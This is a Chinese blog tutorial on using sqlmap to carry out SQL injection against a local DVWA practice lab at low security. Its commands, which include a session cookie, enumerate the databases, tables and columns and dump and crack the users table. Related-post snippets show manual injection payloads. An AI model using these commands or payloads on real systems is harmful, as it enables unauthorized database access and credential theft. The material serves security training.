dvwa之sql injection之sqlmap工具注入(low版)

最新推荐文章于 2024-05-16 15:44:40 发布
最新推荐文章于 2024-05-16 15:44:40 发布
阅读量1.8k 收藏 9
点赞数 1
分类专栏: web安全 文章标签: dvwa sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdnmmd/article/details/80110801
版权

可能要用到的参数:

-u             指定URL

--cookie     带cookie注入


爆库:

--dbs     发现所有数据库 (参数前有空格)

列出数据库:

--tables     列出数据库表  (参数前有空格)

-D            选择数据库


首先一定先把难度调为low


当写1-5的时候,都会有值出来


直接上工具


如下:Sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id =1&submit=sublit#"


有一个302跳转,跳转到的是登录页面,所以这个时候需要使用cookie进行会话维持,然后使用burpsuite或者是f12都行,找到cookie:


security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5

构造语句:sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5"

得到的值:



然后进行爆数据库处理:sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5" --dbs

得到的结果如下:


看到了我们想要的

列出数据库表:

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5" --tables -D dvwa

   -D选项是选择数据库为dvwa

然后 


列出users表的所有字段


–columns -T “users”<列出mysql数据库中的user表的所有字段> (columns参数前带空格)

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5"  --columns -T users    //两个--

然后就是使用字典(自带)进行解密

-T users --dump

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5"  -T users --dump


中间是y 1 n 回车


结果就出来啦





乌鸦安全
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
DVWA-SQL Injection 注入&Sqlmap
原味瓜子、的博客
09-22 400
文章目录SQL注入一、Low等级二、Medium等级三、High等级四、Impossible SQL注入 指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 一、Low等级 1、漏洞分析 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
dvwa-sql注入-sqlmap用法
m0_64987233的博客
07-03 263
其中cookie在f12-network-刷新-headers里面。3.获取指定数据库表。
Sqlmap
mumuzi2的博客
02-25 387
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
DVWA通过攻略之SQL注入_dvwa sql注入
最新发布
2401_84968101的博客
05-16 613
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
网络安全——DVWASQL注入漏洞
猿的一天
01-10 2540
网络安全——DVWASQL注入漏洞
DVWA-WEB漏洞系列之SQL注入
woo233的博客
08-09 3340
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]在用户输入中依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段。攻击者在HTTP请求中注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库中执行。防御SQL注入:使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生。...
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
dvwa靶场通关之sql injection
07-19
dvwa靶场通关之sql injection
2020-12-06-DVWAsql.md
01-24
dvwasql
学习之sql注入漏洞网址的创建
06-06
其次,`sqlmap`是一个自动化工具,用于检测和利用SQL注入漏洞。它能自动识别注入点,进行数据提取、数据库枚举、获取数据库管理权限等操作。在我们的学习环境中,sqlmap可以用来验证我们创建的URL是否真正存在SQL...
DVWASQL Injection
baynk的博客
10-29 1683
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
DVWASQL Injection-lowsqlmap
weixin_44771252的博客
01-29 168
SQL 注入(利用sqlmap)——低安全性 【前言】 上次使用的手工注入,有一定的代码审计。那么对于这种存在sql注入漏洞的,哪必定可以使用sqlmap来进行sql注入。 由于我们的DVWA是要登录上去才可以进行里面相应的一些服务。 那么我们就要获取到浏览器中的cookie。 【准备工作】 登录DVWA,选择SQL Injection,按F12进入调试页面中的网络模块。 点击Submit,寻找注入点与所需要的cookie。 所需要的信息: cookie与注入点 【使用sqlmap】 【爆破所
学习笔记(sql注入
qq_51301115的博客
04-16 128
sql injectionlow) 输入1查询成功 输入1’ or ‘1’ = '1 查询到多个数据,于是判断存在字符型注入 输入1’ or 1 = 1 order by 1 # 查询成功 输入1’ or 1 = 1 order by 2 #查询成功 输入1’ or 1 = 1 order by 3 #返回错误,说明字段为2(通过百度搜索得知:也可以通过输入1’ union select 1,2 #来猜解字段数) 输入1’ union select 1, database() #,查询数据
DVWASQL Injection(含SQLMAP使用)
一期一会的博客
03-21 379
DVWASQL Injection 判断是否存在注入的方法:在输入框输入 1’ Select * from xxxx where id =1’ Select * from xxxx where id =’1’’ 无论是整型还是字符型此时都会报错,说明存在注入点 一.等级:LOW (一)分类 1.整型 测试如下: 此时界面结果显示一致,说明并非整型 select * from xxx where id=1 and 1=2 若为整型,说明sql语句不成立,会报错 2.字符型 在输入框输入“1’ an
dvwa php sql,DVWA SQL Injectionsqlmap使用
weixin_30313365的博客
03-18 169
使用神器sqlmap进行DVWASQL Injection需要注意的点:dvwa需要登录才能访问漏洞测试页面,所以使用sqlmap时需要提交登录后的cookie,cookie中有关于dvwa的security level设置属性,确保属性值是low(1)检测是否存在sql注入漏洞Sqlmap -u “http://127.0.0.1/DVWA-1.0.8/vulnerabilities/sqli...
DVWA SQL注入
m0_55605024的博客
03-01 497
简而言之,是在输入字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些。如:将'dvwa'替换为database() or 替换为0x64767761(将'dvwa'进行16进制编码)2.安装kali操作系统,kali自带sqlmap,可以直接输入sqlmap执行。注入进去的恶意指令就会被数据库误以为是正常的SQL指令而运行。--dbs:database serve 获取所有的数据库名。database():返回当前数据库的名称。防御命令执行的最高效的方法,就是。
DVWA SQL Injection 利用SQLMap注入
Senimo
03-18 732
DVWA SQL Injection 利用SQLMap注入LowMediumHigh Low 输入1,提交后得到回显: 发现是GET传参: http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# 直接携带Cookie后使用SQLMap注入即可: sqlmap -u "http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low
DVWA SQL Injection Sqlmap
SELF_REDEEM的博客
09-10 241
记录使用Sqlmap完成自动化sql注入的实验过程,供自己参考 访问SQL注入页面,输入id,查看访问的URL为 http://192.168.9.128/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit# 使用Sqlmap进行注入测试,但是该URL必须登陆后才能访问,因此我们需要先拿到可以登录的凭证,有的站点认证信息在headers中携带,sqlmap支持加上--headers=HEADERS参数指定headers。假设我们现在拿到了网
dvwasql注入(低级)
12-21
3. 在"SQL Injection"页面中,选择"Low"级别。 4. 在页面上方的输入框中输入一个单引号(')并点击"Submit"按钮。 5. 页面将显示一个错误消息,表明存在SQL注入漏洞。 6. 在输入框中输入以下内容并点击"Submit"按钮...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值